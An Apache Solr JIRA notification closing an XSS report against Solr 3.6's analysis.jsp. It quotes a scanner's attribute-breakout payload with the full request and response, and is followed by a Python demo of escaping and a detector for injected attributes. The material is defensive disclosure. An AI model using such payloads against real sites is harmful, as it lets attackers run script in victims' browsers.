[ https://issues.apache.org/jira/browse/SOLR-4305?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Jan Høydahl closed SOLR-4305.
-----------------------------
    Resolution: Won't Fix

Closing as won't fix as we do not have JSPs anymore :)

> XSS vulnerability in Solr /admin/analysis.jsp
> ---------------------------------------------
>
>                 Key: SOLR-4305
>                 URL: https://issues.apache.org/jira/browse/SOLR-4305
>             Project: Solr
>          Issue Type: Bug
>          Components: multicore
>    Affects Versions: 3.6
>         Environment: Solaris
>            Reporter: Rob Brooks
>              Labels: security
>
> This issue was found when running solr 3.6 in solaris, in a multicore setup.
> Each core had a cross site scripting vulnerability found at
> /admin/analysis.jsp while testing using IBM Rational AppScan 8.5.0.1.
> Here are the details of the scan result as given by IBM Rational AppScan:
> [1 of 1] Cross-Site Scripting
> Severity: High
> Test Type: Application
> Vulnerable URL: https://<server>/solr/<core>/admin/analysis.jsp (Parameter:
> name)
> CVE ID(s): N/A
> CWE ID(s): 79 (parent of 83)
> Remediation Tasks: Review possible solutions for hazardous character injection
> Variant 1 of 6 [ID=19389]
> The following changes were applied to the original request:
> • Set parameter 'name's value to '" onMouseOver=alert(39846)//'
> Request/Response:
> 12/10/2012 3:33:04 PM 16/187
> POST /solr/<core>/admin/analysis.jsp HTTP/1.1
> Cookie: JSESSIONID=0D77846A894B8BB086394C396F19D0E9
> Content-Length: 96
> Accept: */*
> Accept-Language: en-us
> User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64;
> Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR
> 3.0.30729;
> Media Center PC 6.0; Tablet PC 2.0)
> Host: <server>:8443
> Content-Type: application/x-www-form-urlencoded
> Referer: https://<server>/solr/<core>/admin/analysis.jsp?highlight=on
> nt=type&name=" onMouseOver=alert
> (39846)//&verbose=on&highlight=on&val=1234&qverbose=on&qval=1234
> HTTP/1.1 200 OK
> Content-Length: 1852
> Server: Apache-Coyote/1.1
> Content-Type: text/html;charset=utf-8
> Date: Mon, 10 Dec 2012 15:54:38 GMT
> <html>
> <head>
> <script>
> var host_name="<server>"
> </script>
> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
> <link rel="stylesheet" type="text/css" href="solr-admin.css">
> <link rel="icon" href="favicon.ico" type="image/ico"></link>
> <link rel="shortcut icon" href="favicon.ico" type="image/ico"></link>
> <title>Solr admin page</title>
> </head>
> <body>
> <a href="."><img border="0" align="right" height="78" width="142"
> src="solr_small.png" alt="Solr"></a>
> <h1>Solr Admin (Cares)
> </h1>
> <server><br/>
> cwd=/export/home/kh SolrHome=/solr/<core>/
> <br/>
> 12/10/2012 3:33:04 PM 17/187
> HTTP caching is ON
> <br clear="all">
> <h2>Field Analysis</h2>
> <form method="POST" action="analysis.jsp" accept-charset="UTF-8">
> <table>
> <tr>
> <td>
> <strong>Field
> <select name="nt">
> <option >name</option>
> <option selected="selected">type</option>
> </select></strong>
> </td>
> <td>
> <input class="std" name="name" type="text" value=""
> onMouseOver=alert(39846)//">
> </td>
> </tr>
> <tr>
> <td>
> <strong>Field value (Index)</strong>
> <br/>
> verbose output
> <input name="verbose" type="checkbox"
> checked="true" >
> <br/>
> highlight matches
> <input name="highlight" type="checkbox"
> checked="true" >
> </td>
> <td>
> <textarea class="std" rows="8" cols="70" name="val">1234</textarea>
> </td>
> </tr>
> <tr>
> <td>
> <strong>Field value (Query)</strong>
> <br/>
> verbose output
> <input name="qverbose" type="checkbox"
> checked="true" >
> </td>
> <td>
> <textarea class="std" rows="1" cols="70" name="qval">1234</textarea>
> </td>
> </tr>
> <tr>
> <td>
> </td>
> <td>
> <input class="stdbutton" type="submit" value="analyze">
> </td>
> </tr>
> </table>
> </form>
> <strong>Unknown Field Type: " onMouseOver=alert(39846)//</strong>
> </body>
> </html>
> 12/10/2012 3:33:04 PM 18/187
> Validation In Response:
> • option>
> <option selected="selected">type</option>
> </select></strong>
> </td>
> <td>
> <input class="std" name="name" type="text" value="" onMouseOver=alert
> (39846)//">
> </td>
> </tr>
> <tr>
> <td>
> <strong>Field value (Index)</strong>
> <br/>
> verbose output
> <inp
> Reasoning:
> The test successfully embedded a script in the response, which will be
> executed once the user
> activates the OnMouseOver function (i.e., hovers with the mouse cursor over
> the vulnerable
> control). This means that the application is vulnerable to Cross-Site
> Scripting attacks.
> CWE ID:
> 83 (child of 79)
> Vulnerable URL: https://<server>/solr/<core>/admin/threaddump.jsp
> Total of 1 security issues in this URL

--
This message was sent by Atlassian JIRA
(v6.3.4#6332)

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org
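
The attribute breakout described in the quoted scan result, as an added example that is not part of the original message or of Solr's code: it models in Python how the `name` parameter lands in the `value="..."` attribute, unescaped and escaped, and parses the output to list the attributes a browser would see. The function names are hypothetical; the payload string is the one quoted in the report.

```python
from html import escape
from html.parser import HTMLParser

# The value AppScan sent in the 'name' parameter, as quoted in the report.
PAYLOAD = '" onMouseOver=alert(39846)//'


def render_unescaped(name):
    """Models the reported behaviour: the parameter is copied into value="..." as-is."""
    return '<input class="std" name="name" type="text" value="' + name + '">'


def render_escaped(name):
    """Hardened form: encode &, <, >, " and ' before writing into the attribute."""
    return ('<input class="std" name="name" type="text" value="'
            + escape(name, quote=True) + '">')


class _InputAttrs(HTMLParser):
    """Collects the attributes of every <input> tag as an HTML parser sees them."""

    def __init__(self):
        super().__init__()
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.inputs.append(dict(attrs))


def input_attributes(html_text):
    parser = _InputAttrs()
    parser.feed(html_text)
    parser.close()
    return parser.inputs


def injected_handlers(html_text, allowed=("class", "name", "type", "value")):
    """Return attribute names on <input> tags that the template itself never emits."""
    found = []
    for attrs in input_attributes(html_text):
        found.extend(a for a in attrs if a not in allowed)
    return found


if __name__ == "__main__":
    for render in (render_unescaped, render_escaped):
        page = render(PAYLOAD)
        print(render.__name__, injected_handlers(page), input_attributes(page)[0]["value"])
```

The same parse-and-compare check can be run against a captured response body in a regression test to confirm that a reflected parameter never adds attributes to the tag it is written into.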